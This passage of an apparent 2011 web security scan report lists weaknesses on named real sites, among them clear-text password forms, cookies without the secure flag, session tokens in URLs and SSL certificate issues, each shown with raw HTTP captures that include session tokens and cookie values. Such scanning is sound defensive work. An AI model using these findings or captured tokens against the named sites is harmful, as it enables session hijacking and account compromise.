Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</h5>
       
       <form id="login" action="affiliate-employee-login.cfm" method="post">
           <div id="username">
...[SNIP]...
</label>
               <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" />
           </div>
...[SNIP]...

8.4. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<br />

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">

<input type="hidden" name="mode" value="register_done" />
...[SNIP]...
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
...[SNIP]...
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
...[SNIP]...

8.5. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

8.6. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /reg-bin/int.cgi. The form contains the following password field: password.

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</h3>
<form name="LoginForm" action="/reg-bin/int.cgi" method=post>
<input type="hidden" name="mode" value="login_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregtext" value="">
<p class="form-notif">
...[SNIP]...

8.7. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /reg-bin/int.cgi. The form contains the following password fields: password, pwconfirm.

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...

8.8. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /reg-bin/int.cgi. The form contains the following password field: password.

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />
<!-- /.form_input -->
...[SNIP]...

9. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

10. Session token in URL
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://charlotteobserver.adperfect.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://charlotteobserver.adperfect.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:16 GMT
Server: Apache
MIME-Version: 1.0
Content-Length: 15034
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
           <title>O
...[SNIP]...
<span class="ap_loginForm_forgotPass"><a href="password.html?-session=ComboAd:32177B6A160c72C7C8SLM4124B7B" class="sm">Forgot Password?</a>
...[SNIP]...
</span><a href="http://charlotteobserver.adperfect.com/default.html?pubid=none&-session=ComboAd:32177B6A160c72C7C8SLM4124B7B">Home</a>
...[SNIP]...

10.2. http://control.adap.tv/control

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32443

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...

10.3. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:27 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sun, 04 Sep 2011 01:22:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">FeedBurner</a>
...[SNIP]...
<div id="footer">
&copy;2004&ndash;2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">Terms of Service</a>
...[SNIP]...

10.4. http://log.adap.tv/log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://log.adap.tv
Path:   /log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0


10.5. http://qlog.adap.tv/log

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://qlog.adap.tv
Path:   /log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0


10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

10.7. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:11 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f7783dc98&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fe739c6", "h
...[SNIP]...

11. SSL certificate
There are 13 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



11.1. https://google.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://google.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

11.2. https://login.yahoo.com/